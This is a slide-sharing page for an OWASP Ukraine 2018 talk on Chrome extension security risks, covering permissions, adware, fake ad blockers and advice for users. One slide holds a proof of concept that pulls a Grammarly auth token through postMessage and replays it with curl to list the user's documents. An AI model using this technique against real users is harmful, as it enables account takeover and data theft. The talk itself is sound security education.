Issues with chrome extensions presentation (OWASP Ukraine 2018)

•

0 likes•90 views

OlehLevytskyi1

OWASP Ukraine 2018 presentation "Issues with chrome extensions" by Oleh Levytskyi (https://twitter.com/LeOleg97)

Engineering

2
# Whoami
https://twitter.com/leoleg97
https://t.me/LeOleg
ol@underdefense.com
● Oleh
● Security Analyst at UnderDefense

4
1. Review chrome extensions structure
2. What’s wrong with Chrome extensions? (based on practical
examples)
3. Useful sites and toolset armory
4. Recommendations
Agenda

5
What is Chrome Extension?
● Extensions are small software programs that customize the browsing
experience. They enable users to tailor Chrome functionality and behavior to
individual needs or preferences. They are built on web technologies such as
HTML, JavaScript, and CSS.
● https://chrome.google.com/webstore/category/extensions

$6 { "description": "Extensions description", "key": "MIIISDSDFDSFDSAFD...", "manifest_version": 2, "name": "Extension name", "permissions": [ "history", "http://*/*", "https://*/*" ], "version": "1.8" } hash(key)=extensionId Chrome extension structure Windows: C:Users<Your_User_Name>AppDataLocalGoogleChromeUser DataDefaultExtensionsextensionId Linux: ~/.config/google-chrome/Default/Extensions/extensionId MacOS: ~/Library/Application Support/Google/Chrome/Default/Extensions/extensionId manifest.json$

7
PROBLEMS EVERYWHERE
PROBLEMS
Issues with Chrome extensions

8
Abnormal and potentially dangerous permissions
All data on your computer and the websites you visit
Your data on all the websites you visit
Your data on a list of websites
Your list of installed apps, extensions and themes
Your bookmarks, your browsing history, your tabs and
browsing activity, your physical location, data you copy
and paste

9
Beta mechanism of limiting permissions

11
(Un-) trusted developers
Popular extension became adware (function buildAds)

13
Safari:
Firefox:
Example: Developer identifier in other browsers

17
Mega Chrome extension has been hacked

19
20,000,000 users installed fake AdBlockers
that executed modified jQuery library:
● AdRemover for Google Chrome™ (10M+ users)
● uBlock Plus (8M+ users)
● Adblock Pro (2M+ users)
● HD for YouTube™ (400K+ users)
● Webutation (30K+ users)
Link: https://adguard.com/en/blog/over-20-000-000-of-chrome-users-are-victims-of-fake-ad-blockers/
Fake browser extensions

$22 > document.body.contentEditable=true // Trigger grammarly > document.querySelector("[data-action=editor]").click() // Click the editor button > document.querySelector("iframe.gr_-ifr").contentWindow.addEventListener("message", function (a) { console.log(a.data.user.email, a.data.user.grauth); }) // log auth token and email > window.postMessage({grammarly: 1, action: "user" }, "*") // Request user data testaccount.zzxxyyaa@gmail.com AABEnOZHVclnIAvUTKa4yc1waRRf59-hY3dVDT0gvrDfcJDAFt3Nlq84LpWFpzH1tkxzqs curl --cookie " grauth=AABEnOZHVclnIAvUTKa4yc1waRRf59-hY3dVDT0gvrDfcJDAFt3Nlq84LpWFpzH1tkxzqs; " -A Mozilla -si ' https://dox.grammarly.com/documents?search=&limit=100&firstCall=false ' //PoC - list all uploaded documents … human mistakes$

23
Useful sites and toolset armory
Link: http://crx.dam.io

Link: https://chrome.google.com/webstore/detail/chrome-extension-source-v/
jifpbeccnghkjeaalbbjmodiffmgedin
24
Crx source viewer
Useful sites and toolset armory

25
Proxy
Useful sites and toolset armory

DevTools
26
Useful sites and toolset armory

28
Look into reviews and number of installs
c
c
c

29
Don’t install extensions with abnormally high permissions

31
Install extensions only from trusted developers

33
Think twice before
installing new
extensions
Less is better…

5. 5 What is Chrome Extension? ● Extensions are small software programs that customize the browsing experience. They enable users to tailor Chrome functionality and behavior to individual needs or preferences. They are built on web technologies such as HTML, JavaScript, and CSS. ● https://chrome.google.com/webstore/category/extensions

6. 6 { "description": "Extensions description", "key": "MIIISDSDFDSFDSAFD...", "manifest_version": 2, "name": "Extension name", "permissions": [ "history", "http://*/*", "https://*/*" ], "version": "1.8" } hash(key)=extensionId Chrome extension structure Windows: C:Users<Your_User_Name>AppDataLocalGoogleChromeUser DataDefaultExtensionsextensionId Linux: ~/.config/google-chrome/Default/Extensions/extensionId MacOS: ~/Library/Application Support/Google/Chrome/Default/Extensions/extensionId manifest.json

7. 7 PROBLEMS EVERYWHERE PROBLEMS Issues with Chrome extensions

8. 8 Abnormal and potentially dangerous permissions All data on your computer and the websites you visit Your data on all the websites you visit Your data on a list of websites Your list of installed apps, extensions and themes Your bookmarks, your browsing history, your tabs and browsing activity, your physical location, data you copy and paste

9. 9 Beta mechanism of limiting permissions

10. 10 (Un-) trusted developers

11. 11 (Un-) trusted developers Popular extension became adware (function buildAds)

12. 12 Extensions offered by ...

13. 13 Safari: Firefox: Example: Developer identifier in other browsers

14. 14 Obfuscated code

15. 15 Obfuscated code

16. 16 Broken process of extension review

17. 17 Mega Chrome extension has been hacked

18. 18 Stylish spyware functionality

19. 19 20,000,000 users installed fake AdBlockers that executed modified jQuery library: ● AdRemover for Google Chrome™ (10M+ users) ● uBlock Plus (8M+ users) ● Adblock Pro (2M+ users) ● HD for YouTube™ (400K+ users) ● Webutation (30K+ users) Link: https://adguard.com/en/blog/over-20-000-000-of-chrome-users-are-victims-of-fake-ad-blockers/ Fake browser extensions

20. 20 Fake AdRemover use-case

21. 21 Fake AdRemover use-case

22. 22 > document.body.contentEditable=true // Trigger grammarly > document.querySelector("[data-action=editor]").click() // Click the editor button > document.querySelector("iframe.gr_-ifr").contentWindow.addEventListener("message", function (a) { console.log(a.data.user.email, a.data.user.grauth); }) // log auth token and email > window.postMessage({grammarly: 1, action: "user" }, "*") // Request user data testaccount.zzxxyyaa@gmail.com AABEnOZHVclnIAvUTKa4yc1waRRf59-hY3dVDT0gvrDfcJDAFt3Nlq84LpWFpzH1tkxzqs curl --cookie " grauth=AABEnOZHVclnIAvUTKa4yc1waRRf59-hY3dVDT0gvrDfcJDAFt3Nlq84LpWFpzH1tkxzqs; " -A Mozilla -si ' https://dox.grammarly.com/documents?search=&limit=100&firstCall=false ' //PoC - list all uploaded documents … human mistakes

23. 23 Useful sites and toolset armory Link: http://crx.dam.io

24. Link: https://chrome.google.com/webstore/detail/chrome-extension-source-v/ jifpbeccnghkjeaalbbjmodiffmgedin 24 Crx source viewer Useful sites and toolset armory

25. 25 Proxy Useful sites and toolset armory

26. DevTools 26 Useful sites and toolset armory

27. 27 Recommendations

28. 28 Look into reviews and number of installs c c c

29. 29 Don’t install extensions with abnormally high permissions

30. 30 Run...

31. 31 Install extensions only from trusted developers

32. 32 Read privacy policy

33. 33 Think twice before installing new extensions Less is better…

34. 34 Update